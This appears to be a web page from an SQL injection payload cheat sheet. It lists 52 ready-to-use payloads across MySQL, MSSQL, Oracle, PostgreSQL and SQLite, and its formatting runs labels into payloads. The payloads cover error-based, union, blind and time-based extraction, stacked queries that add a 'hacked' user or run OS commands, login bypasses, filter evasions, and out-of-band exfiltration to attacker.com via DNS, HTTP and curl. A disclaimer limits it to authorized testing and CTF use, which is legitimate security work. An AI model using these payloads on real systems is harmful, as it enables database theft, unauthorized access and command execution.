sqli-payloads
root@sovietghost:~/tools/sqli-payloads#
52 SQL injection payload reference — for authorized testing and CTF use only.
52 payloads
extractvalue()Error-BasedMySQL
1 AND extractvalue(1,concat(0x7e,(SELECT version())))updatexml()Error-BasedMySQL
1 AND updatexml(1,concat(0x7e,(SELECT database())),1)floor(rand())Error-BasedMySQL
1 AND (SELECT 1 FROM(SELECT COUNT(*),concat((SELECT database()),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)convert()Error-BasedMSSQL
1 AND 1=convert(int,(SELECT TOP 1 table_name FROM information_schema.tables))cast()Error-BasedMSSQL
1 AND 1=cast((SELECT TOP 1 name FROM sysobjects WHERE xtype='U') AS int)XMLType()Error-BasedOracle
1 AND 1=XMLType('<?xml version="1.0"?>'||(SELECT banner FROM v$version WHERE rownum=1)||'?>','')CAST()Error-BasedPostgreSQL
1 AND CAST((SELECT version()) AS int)Column count probeUnion-BasedGeneric
1 ORDER BY 1--UNION NULL probeUnion-BasedGeneric
1 UNION SELECT NULL--2-col DB/userUnion-BasedMySQL
1 UNION SELECT database(),user()--Table dumpUnion-BasedMySQL
1 UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema=database()--Column dumpUnion-BasedMySQL
1 UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--2-col DB/userUnion-BasedMSSQL
1 UNION SELECT db_name(),system_user--2-col from dualUnion-BasedOracle
1 UNION SELECT banner,NULL FROM v$version--2-col versionUnion-BasedPostgreSQL
1 UNION SELECT version(),NULL--Substring char testBlind BooleanMySQL
1 AND SUBSTRING((SELECT database()),1,1)='a'ASCII char compareBlind BooleanMySQL
1 AND ASCII(SUBSTRING((SELECT database()),1,1))>96Table count testBlind BooleanMySQL
1 AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>0True conditionBlind BooleanGeneric
1 AND 1=1--False conditionBlind BooleanGeneric
1 AND 1=2--ⓘ page should differ from true case
Substring testBlind BooleanMSSQL
1 AND SUBSTRING((SELECT db_name()),1,1)='m'ASCII probeBlind BooleanPostgreSQL
1 AND ASCII(SUBSTRING((SELECT current_database()),1,1))>64SLEEP()Blind TimeMySQL
1 AND SLEEP(5)--BENCHMARK()Blind TimeMySQL
1 AND BENCHMARK(10000000,MD5('a'))Conditional SLEEPBlind TimeMySQL
1 AND IF(1=1,SLEEP(5),0)--WAITFOR DELAYBlind TimeMSSQL
1; WAITFOR DELAY '0:0:5'--pg_sleep()Blind TimePostgreSQL
1; SELECT pg_sleep(5)--dbms_pipe.receiveBlind TimeOracle
1 AND 1=DBMS_PIPE.RECEIVE_MESSAGE('a',5)RANDOMBLOB()Blind TimeSQLite
1 AND 1=randomblob(100000000)INSERT userStacked QueriesMSSQL
'; INSERT INTO users(username,password) VALUES('hacked','hacked')--xp_cmdshellStacked QueriesMSSQL
'; EXEC xp_cmdshell('whoami')--ⓘ requires xp_cmdshell enabled
Multiple statementsStacked QueriesMySQL
'; SELECT 1; SELECT 2--ⓘ depends on DB connector settings
COPY to fileStacked QueriesPostgreSQL
'; COPY (SELECT '') TO PROGRAM 'id'--Classic ' OR 1=1Auth BypassGeneric
' OR 1=1--Comment bypassAuth BypassGeneric
admin'--OR with quotesAuth BypassGeneric
' OR 'a'='aNull passwordAuth BypassGeneric
admin' AND 1=0 UNION SELECT 'admin','Hash bypassAuth BypassMySQL
' OR 1=1 LIMIT 1--OR with 1#Auth BypassGeneric
' OR 1=1#OR with ;--Auth BypassMSSQL
' OR 1=1;--/**/ commentsWAF BypassGeneric
1/**/UNION/**/SELECT/**/1,2--/*!*/ version hintWAF BypassMySQL
1 /*!UNION*/ /*!SELECT*/ 1,2--URL double encodingWAF BypassGeneric
1%2520UNION%2520SELECT%25201%252C2--ⓘ double URL-encode spaces
Case variationWAF BypassMySQL
1 uNiOn SeLeCt 1,2--Tab/newlineWAF BypassGeneric
1 UNION
SELECT 1,2--Scientific notationWAF BypassMySQL
1e0UNION(SELECT(1),(2))Plus for spaceWAF BypassGeneric
1+UNION+SELECT+1,2--Backtick quotesWAF BypassMySQL
1 UNION SELECT `version()`,2--LOAD_FILE DNSOut-of-BandMySQL
1 AND LOAD_FILE(concat('\\\\',version(),'.attacker.com\\x'))ⓘ requires FILE privilege
DNS via xp_dirtreeOut-of-BandMSSQL
'; EXEC master..xp_dirtree '//attacker.com/a'--UTL_HTTP exfilOut-of-BandOracle
1 AND UTL_HTTP.request('http://attacker.com/'||(SELECT banner FROM v$version WHERE rownum=1))=1COPY to remoteOut-of-BandPostgreSQL
'; COPY (SELECT version()) TO PROGRAM 'curl http://attacker.com/ -d @-'--